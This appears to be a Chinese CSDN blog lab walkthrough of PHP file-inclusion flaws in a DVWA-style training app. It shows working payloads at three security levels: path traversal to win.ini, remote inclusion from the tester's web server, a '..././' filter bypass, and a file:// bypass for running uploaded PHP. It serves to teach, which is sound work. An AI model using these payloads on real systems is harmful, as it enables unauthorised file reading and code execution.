文件包含//

最新推荐文章于 2024-06-30 00:32:22 发布
最新推荐文章于 2024-06-30 00:32:22 发布
阅读量988 收藏 9
点赞数 35
文章标签: linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70964247/article/details/139669893
版权

文件包含是指当服务器开启allowurlinclude选项时,就可以通过php的某些特性函数(include(),require()和includeonce(),requireonce())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allowurlfopen选项(选项开启之后,服务器允许包含一个远程的文件)。

安全等级:低,将页面安全等级调为低。点击查看源码按钮,可以看到此时后台的实现代码如下:

可以看到url处,通过page参数分别传入的file1.php,file2.php,file3.php实现了不同的功能。那我们尝试着使用file4.php进行访问(请使用实际实验给到的靶机ip地址):

可以尝试包含以下windows(服务器为windows,如果为linux可以尝试包含/etc/passwd)中的其他文件呢?尝试构造以下链接

或者使用../的方式来进行目录跳转,可构造payload(请使用实际实验给到的靶机ip地址):

http://172.16.33.165/web/vulnerabilities/fi/?page=../../../../../windows/win.ini

由于包含的文件不是php代码,所以直接显示在了页面中,如果包含的文件为php代码,那代码将会执行。我们可以利用此漏洞去读取一些敏感文件,有些时候还可以通过包含日志的方式来getshell。

当服务器的php配置中,选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致任意远程代码执行。

在操作机上创建以下文件,文件后缀随意,比如1.txt,内容为:

http://172.16.33.165:8080/1.txt

这里需要确保服务器能访问到我们搭建的web服务。

所以我们可以尝试包含这个文件:

http://172.16.33.165/web/vulnerabilities/fi/?page=http://172.16.16.17:8080/1.txt

中级。点击查看源码按钮,可以看到此时后台的实现代码如下

与安全等级为低的代码相比,此时的后台代码添加了str_replace来过滤传入字符串。将http://,https://,../,..\过滤为空,即删除。但是使用这种方式是及其不安全的。比如构造payload:

http://172.16.33.165/web/vulnerabilities/fi/?page=..././..././..././..././..././windows/win.ini 

对于远程包含,可以构造:

安全等级:高,将页面安全等级调为高。点击查看源码按钮,可以看到此时后台的实现代码如下:

此时后台代码使用了fnmatch函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件。看似比较安全,但是我们可以利用file协议绕过防护,继续进行文件包含,构造payload如下:

可以看到成功包含。至于执行任意php代码,需要配合文件上传漏洞利用。首先需要上传一个内容为php的文件,然后再利用file协议去包含上传文件(需要知道上传文件的绝对路径),从而实现任意代码执行。 如,已知服务器上存在一个c:/1.txt,内容为:

<?php

 phpinfo();

 ?>

那包含的结果为:

http://172.16.33.165/web/vulnerabilities/fi/index.php?page=file://c:/1.txt

yyk..
关注
  • 35
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
嵌入式Linux下文件I/O
12-01
本文将深入探讨嵌入式Linux下的文件I/O机制,包括基本概念、API接口、以及实际应用示例。我们将通过分析提供的课件、源码和说明,帮助你全面理解这一关键主题。 1. **文件I/O基础** 在Linux系统中,一切皆为文件,...
EDA/PLD中的LabVIEW的文件I/O操作
11-16
常见的文件I/O操作包括以下流程: · (1)创建或打开一个文件。文件打开后,引用句柄即代表该文件的惟一标识符; · (2)文件I/O VI或函数从文件中读取或向文件中写入数据; · (3)关闭文件。在完成对文件...
linux下/etc/passwd文件的选项说明
09-16
/etc/passwd 文件是系统的主要文件之一。该文件中包含了所有用户登录名清单;为所有用户指定了主目录;在登录时使用的 shell 程序名称等。该文件还保存了用户口令;给每个用户提供系统识别号。
文件I/O常用函数总结
02-10
自己总结的Linux c中常用的文件I/O函数,内容包括了函数的使用以及注意事项
sdcard.rar_文件操作_C/C++_
08-11
文件包含sdcard的源代码和操作文件,内容比较齐全。
Linux杂货铺】Linux学习之路:期末总结篇1
聆风吟的博客
06-28 1106
本文主要讲了作者本人期末复习时的总结,欢迎大家借鉴浏览。
运维.Linux下执行定时任务(上:Cron简介与用法解析)
jclee95的个人博客
06-25 1394
介绍Linux/Linux系统下,用于执行定时任务的Cron
应急响应靶机-Linux(1)
tmyzxy1314的博客
06-27 375
先找到的三个flag,最后才找的ip地址所以麻烦各位读者先从下面开始看起!!!ip地址也是看了wp才知道接着flag第三题的过程看一眼,redis日志文件等级cat /etc/redis.conf | grep loglevel整个命令cat /etc/redis.conf | grep loglevel的作用是显示/etc/redis.conf文件中所有包含“loglevel”的行,这通常用于快速查找和查看Redis配置文件中关于日志级别的设置为loglevel verbose级别直接去找redis日志文
Linux_应用篇(25) SPI 应用编程基础
weixin_41252596的博客
06-25 920
Linux SPI 应用编程基础
Linux】进程信号_3
m0_69828905的博客
06-26 519
在进程的PCB中,有两个位图,一个是判断是否收到相应信号的位图pending,一个是决定该位置的信号是否阻塞的位图block。注意,阻塞和忽略是不同的,只要信号被阻塞就不会递达,而忽略是在递达之后可选的一种处理动作。被阻塞的信号产生时将保持在未决状态,直到进程解除对此信号的阻塞,才执行递达的动作。信号从产生到递达之间的状态,称为信号未决(Pending)。9号信号、19号信号无法被屏蔽,18号信号会做特殊处理。可以读取或更改进程的信号屏蔽字(阻塞信号集)。进程可以选择阻塞 (Block )某个信号。
linux】find命令详解
m0_67326897的博客
06-27 352
Linux中的find命令用于在文件系统中搜索符合条件的文件或目录。
Puppy Linux-最小的操作系统-仍然在更新32位设备的支持
地球空间
06-28 703
Puppy Linux 是一个由多个 Linux 发行版组成的集合,它们建立在相同的共享原则之上,使用相同的一套工具构建,建立在一套独特的 Puppy 特定应用程序和配置之上,通常无论您选择哪种口味,都能提供一致的行为和功能。使用 Woof 构建的 Puppy Linux 发行版 → 为满足特定需求和外观而开发,也针对一般用途,使用 Puppy Linux 系统构建器(称为 Woof-CE)构建,带有一些附加或修改的软件包。多样性 → 数以百计的衍生版("puplets"),其中之一肯定能满足您的需求。
Linux 字符型设备 + platform总线 + sysfs设备模型
weixin_39223971的博客
06-24 824
原文链接:https://blog.csdn.net/dengjin20104042056/article/details/138501685。
零基础小白学习 Python,应该如何配置 Python 开发环境?(包含Windows、MacOS、Linux
Itmastergo的博客
06-26 818
学习编程的第一步是配置一个良好的开发环境,尤其是对零基础的小白来说,一个简单而有效的开发环境能够帮助你快速上手,减少不必要的技术障碍。
【面试题】Linux下的GDB(第二篇)
abclui的专栏
06-25 573
当程序崩溃时,操作系统可能会生成一个coredump文件(核心转储文件),该文件包含了程序崩溃时的内存映像和寄存器状态等信息。:在调试多线程程序时,需要特别注意线程间的同步和通信机制,以及避免竞态条件等问题。(当单步调试某一个线程时,保证在调试过程中当前线程不会发生改变,其他线程也会随着被调试线程的单步执行而单步执行)。GDB会自动加载可执行文件和coredump文件,并停留在程序崩溃时的位置。命令监视变量的值,当变量值发生变化时,GDB会自动停止程序。当程序被停住时,可以检查或者说监视此时程序中的数值。
Linux安全配置
m0_62207482的博客
06-26 695
Linux系统审计信息有:系统启动日志(boot.log)、记录用户执行命令日志(acct/pacct)、记录使用su命令的使用(sulog)、记录当前登录的用户信息(utmp)、用户每次登陆和退出信息(wtmp)、最近几次成功登陆及最后一次不成功登陆日志(lastlog) 最小特权原则指系统中每一个主体只能拥有完成任务所必要的权限集。最小特权管理的目的是系统不应赋予特权拥有者完成任务的额外权限,组织特权乱用。为此,特权的分配原则是“按需使用”这条原则保证系统不会将权限过多的分配给用户,从而
LinuxLinux中DNS配置文件/etc/resolv.conf详解
追寻梦想的青春
06-26 876
当然也跟服务的FQDN格式有关,可以看到如果用全的FQDN格式,其中就有4个点号,而且,根据服务名的规范,服务名中是不能包含点号的,因此,服务的FQDN中只有4个点号。这里提到一个重要的配置项:ndots,该配置项会作为是否需要优先与search配置的域名后缀拼接还是直接查询域名的判断依据,也就是说,如果域名中的点号超过ndots,说明域名足够长,大概率是全域名,直接查询该域名,如果域名中的点号小于ndots,说明该域名比较短,大概率需要与域名后缀拼接。,会直接报错查询不到;
Linux-网络编程
最新发布
ITQWQ的博客
06-30 436
本文将介绍网络编程中的一些基础知识,包括TCP和UDP的区别、端口号的作用、字节序的概念,以及通过socket编程实现客户端和服务器之间的通信。我们还会展示一些示例代码,帮助理解这些概念的实际应用。
Linux】进程信号_1
m0_69828905的博客
06-25 781
当信号产生时,可选的处理方式有三种:①忽略此信号。②执行该信号的默认处理动作。③自定义处理信号,这种方式称为捕捉(Catch)一个信号。信号和信号量之间没有任何关系。信号是Linux系统提供的让用户/进程给其他进程发送异步信息的一种方式。此时进程当接收到2号信号时,就输出了一句话并没有终止进程。接下来我们让进程对2号信号做出自定义行为。信号可以由 kill 命令产生,也能够从键盘上产生。会被操作系统解释成2号信号。函数这样设置时,就代表将。
vs2019 无法打开包括文件 Eigen/Dense
07-28
您好!对于无法打开包括文件 "Eigen/Dense" 的问题,可能是由于以下原因之一导致的: 1. Eigen 库未正确安装:请确保您已正确安装了 Eigen 库,并且该库的路径已正确添加到 Visual Studio 2019 的项目设置中。您可以从 Eigen 官方网站(http://eigen.tuxfamily.org/)下载最新版本的 Eigen 库,并按照其提供的安装说明进行安装。 2. 包含路径设置错误:请检查您的项目设置中是否正确设置了包含文件的路径。在 Visual Studio 2019 中,您可以通过右键单击项目,选择“属性”,然后在“VC++目录”下的“包含目录”中添加正确的路径。 3. 头文件名称错误:请确保您正确地包括了 "Eigen/Dense" 头文件。如果您使用的是其他头文件名称或路径,请相应地进行更正。 请尝试检查上述问题,并根据需要进行相应的更正。如果问题仍然存在,请提供更多详细信息,让我能够更好地帮助您解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值